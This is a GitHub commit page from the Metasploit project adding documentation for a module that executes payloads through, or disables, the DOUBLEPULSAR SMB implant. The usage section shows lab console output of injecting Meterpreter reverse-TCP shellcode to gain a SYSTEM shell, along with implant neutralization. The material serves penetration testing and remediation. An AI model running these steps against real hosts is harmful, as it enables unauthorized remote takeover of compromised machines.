-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #12374, Add DOUBLEPULSAR payload execution and neutralization mo…
…dule
- Loading branch information
Showing
2 changed files
with
478 additions
and
0 deletions.
There are no files selected for viewing
94 changes: 94 additions & 0 deletions
94
documentation/modules/exploit/windows/smb/doublepulsar_rce.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
## Introduction | ||
|
||
This module executes a Metasploit payload against the Equation Group's | ||
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. | ||
|
||
While this module primarily performs code execution against the implant, | ||
the `Neutralize implant` target allows you to disable the implant. | ||
|
||
## Targets | ||
|
||
``` | ||
Id Name | ||
-- ---- | ||
0 Execute payload | ||
1 Neutralize implant | ||
``` | ||
|
||
## Options | ||
|
||
**DefangedMode** | ||
|
||
Set this to `false` to disable defanged mode and enable module | ||
functionality. Set this only if you're SURE you want to proceed. | ||
|
||
**ProcessName** | ||
|
||
Set this to the userland process you want to inject the payload into. | ||
Defaults to `spoolsv.exe`. | ||
|
||
## Usage | ||
|
||
Pinging the implant: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > check | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[+] 192.168.56.115:445 - The target is vulnerable. | ||
msf5 exploit(windows/smb/doublepulsar_rce) > | ||
``` | ||
|
||
Executing a payload: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload | ||
target => Execute payload | ||
msf5 exploit(windows/smb/doublepulsar_rce) > run | ||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp | ||
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes | ||
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Payload execution successful | ||
[*] Sending stage (206403 bytes) to 192.168.56.115 | ||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > sysinfo | ||
Computer : WIN-S7TDBIENPVM | ||
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 1 | ||
Meterpreter : x64/windows | ||
meterpreter > | ||
``` | ||
|
||
Neutralizing the implant: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant | ||
target => Neutralize implant | ||
msf5 exploit(windows/smb/doublepulsar_rce) > run | ||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Implant neutralization successful | ||
[*] Exploit completed, but no session was created. | ||
msf5 exploit(windows/smb/doublepulsar_rce) > | ||
``` |
Oops, something went wrong.